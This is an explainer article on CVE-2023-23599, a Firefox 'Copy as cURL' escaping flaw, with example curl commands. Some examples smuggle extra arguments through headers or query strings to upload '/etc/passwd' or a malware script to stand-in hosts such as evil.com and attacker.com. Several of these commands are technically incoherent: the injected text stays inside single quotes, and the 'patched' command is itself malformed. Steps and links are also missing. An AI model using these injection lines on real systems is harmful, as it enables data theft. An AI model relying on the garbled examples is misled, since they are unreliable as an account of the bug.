CVE-2023-23599 is a significant vulnerability that quietly lurked in Firefox, Firefox ESR, and Thunderbird before their respective updates in early 2023. This issue didn’t allow remote code execution in the browser—as many bugs do—but through a subtle flaw in how network requests were exported, it could lead to dangerous scenarios on your computer. In this article, we’ll break down how this vulnerability worked, how an attacker could exploit it, and provide links and code examples so you can understand the issue, even if you’re not a cybersecurity expert.
The Flaw: "Copy as cURL" Wasn’t Safe
When using web browsers’ developer tools, developers often inspect network requests and copy them for troubleshooting or replaying them elsewhere. Firefox’s developer tools panel allows users to "Copy as cURL," generating a curl command that mimics the selected network request.
Here’s the catch: Until version 109 (and the corresponding ESR/Thunderbird fixes), Firefox’s "Copy as cURL" feature did not properly sanitize the request data. This meant clever attackers could manipulate values in HTTP headers or URLs so that the cURL command, when pasted and executed in a terminal, would run hidden malicious commands on the user’s system.
A Simple Example
Suppose a malicious server responded to your request with a header or cookie that, when placed into the cURL command, could break out of the expected argument and inject something undesirable.
Malicious Set-Cookie header
Set-Cookie: session=abc; --data-binary @/tmp/malware.sh; #"
Firefox would convert this into a cURL command
curl 'https://evil.com/api'; \
-H 'Cookie: session=abc; --data-binary @/tmp/malware.sh; #"'
If a naive user copies and executes this command in a shell, the @/tmp/malware.sh part tells cURL to upload data from the malicious shell script, possibly leading to code execution depending on server response.
But with even more clever escaping, it might be possible to inject shell commands. For example, an attacker crafts a URL like:
https://site.com/api?param=test"; --data-binary "@/tmp/malware.sh" #
If Firefox Developer Tools wraps arguments in single quotes but does not escape embedded " or other special characters, the resulting cURL command might be:
curl 'https://site.com/api?param=test"; --data-binary "@/tmp/malware.sh" '
Now, upon copy-pasting, this chunk after the original URL is interpreted as additional cURL commands, not part of the URL.
Exploitation Path
1. Attacker controls server-side content: They respond with headers or redirects containing special characters, or direct the victim to a maliciously crafted URL.
Victim opens dev tools and uses "Copy as cURL" for normal debugging.
3. Victim pastes and runs the cURL command in the terminal. The unsafe text piggybacks on the copied command, and unintended shell actions or cURL command modifications are executed.
*For most users, the practical risk came during security testing, API debugging, bug reporting, or any case where copying and reusing cURL commands is common.*
What Did the Patch Change?
Starting with Firefox 109, Firefox ESR 102.7, and Thunderbird 102.7, Mozilla hardened the escaping in "Copy as cURL." Now, potentially dangerous characters are sanitized or properly encoded so they don’t get misinterpreted by terminals or cURL itself.
## Example of Safe/Unsafe Code
Unsafe cURL Command Before Patch
curl 'https://attacker.com/api?query="; --upload-file /etc/passwd #' \
-H 'User-Agent: Firefox'
> The extra --upload-file part is wrongly interpreted as another parameter, leaking data or executing arbitrary actions.
#### Patched/Safe cURL Command
curl 'https://attacker.com/api?query=%22%20--upload-file%20%2Fetc%2Fpasswd%20%23'; \
-H 'User-Agent: Firefox'
> All dangerous input is percent-encoded, neutralizing the trick.
Mozilla Foundation Security Advisory 2023-04:
Firefox Bugzilla report:
Bug 180458
- NIST NVD Entry for CVE-2023-23599
Final Thoughts & Lessons
CVE-2023-23599 is a textbook example of how tiny oversights in developer convenience features can create unexpected security holes. Always check for updates to your browser and developer tools, and double check shell commands, especially those generated dynamically.
If you’re a developer, pay attention to sanitization when crossing the boundaries between application layers (browser to terminal, web to OS, etc.).
Stay safe, keep up with security advisories, and never blindly trust anything—especially what you copy and paste into your terminal!
Timeline
Published on: 06/02/2023 17:15:00 UTC
Last modified on: 06/09/2023 18:05:00 UTC